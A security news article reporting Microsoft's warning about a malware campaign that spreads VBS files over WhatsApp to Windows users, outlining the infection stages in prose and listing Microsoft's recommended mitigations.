The attack begins when a user executes a VBS file received via WhatsApp
Microsoft has warned of a new malware campaign in which attackers use WhatsApp messages to distribute malicious VBS files targeting Windows users, enabling remote access and evading detection through social engineering and legitimate tools.
Microsoft has issued a warning over a new cyberattack campaign that uses WhatsApp messages to distribute malware capable of compromising Windows computers and granting attackers long-term remote access.
The company said the activity, first observed in late February 2026, centres on malicious Visual Basic Script (VBS) files sent directly to users via the popular messaging platform.
Once opened, the files initiate a complex, multi-stage infection chain designed to evade detection while embedding itself deeply within affected systems.
Researchers at Microsoft say it remains unclear what tactics are being used to persuade recipients to open the files, but believe the campaign relies heavily on social engineering.
“The campaign relies on a combination of social engineering and living-off-the-land techniques,” the Microsoft Defender Security Research Team said in a blog post.
Such techniques involve abusing legitimate tools already present on a system, allowing attackers to operate without introducing obvious malicious software.
In this case, hackers are disguising commonly used Windows utilities under different names to blend in with routine system activity.
Attack chain
The attack begins when a user executes a VBS file received via WhatsApp. The script then creates hidden directories within the system and installs renamed versions of legitimate tools such as curl.exe and bitsadmin.exe, making them harder for security systems to identify.
Once a foothold has been established, the malware retrieves additional payloads from well-known cloud services including AWS, Tencent Cloud and Backblaze B2.
The use of these trusted platforms enables attackers to mask malicious traffic as normal network activity.
Security experts say this approach significantly increases the likelihood of success. By relying on legitimate infrastructure and tools, the attackers can bypass conventional detection methods and remain undetected for longer periods.
Microsoft says the malware then attempts to escalate its privileges by tampering with User Account Control (UAC) settings, a key Windows security feature. It repeatedly tries to launch command-line processes with elevated permissions, modifying system registry entries in the process.
These changes are designed to weaken system defences and ensure persistence, the company said. The malware embeds mechanisms that allow it to survive system reboots and maintain control over time.
In later stages of the attack, unsigned Microsoft Installer (MSI) packages are deployed. These may include legitimate remote-access tools such as AnyDesk, which can be used by attackers to control infected machines, extract sensitive data or install further malware.
Mitigation and protection
To mitigate the threat, Microsoft has urged organisations to strengthen endpoint protections by restricting the execution of script-hosting tools such as wscript and cscript in untrusted locations.
It also recommends monitoring for unusual behaviour involving renamed system utilities.
The company further advises organisations to inspect and filter traffic to cloud platforms to detect suspicious downloads, even when originating from reputable services.
Additional recommendations include monitoring registry changes linked to persistence techniques, blocking access to known command-and-control infrastructure, and educating users about the risks of unexpected attachments.
Individuals are encouraged to exercise caution when receiving files via messaging apps, even from known contacts, and to ensure that security features such as cloud-delivered antivirus protection are enabled.
Click Here For The Original Source
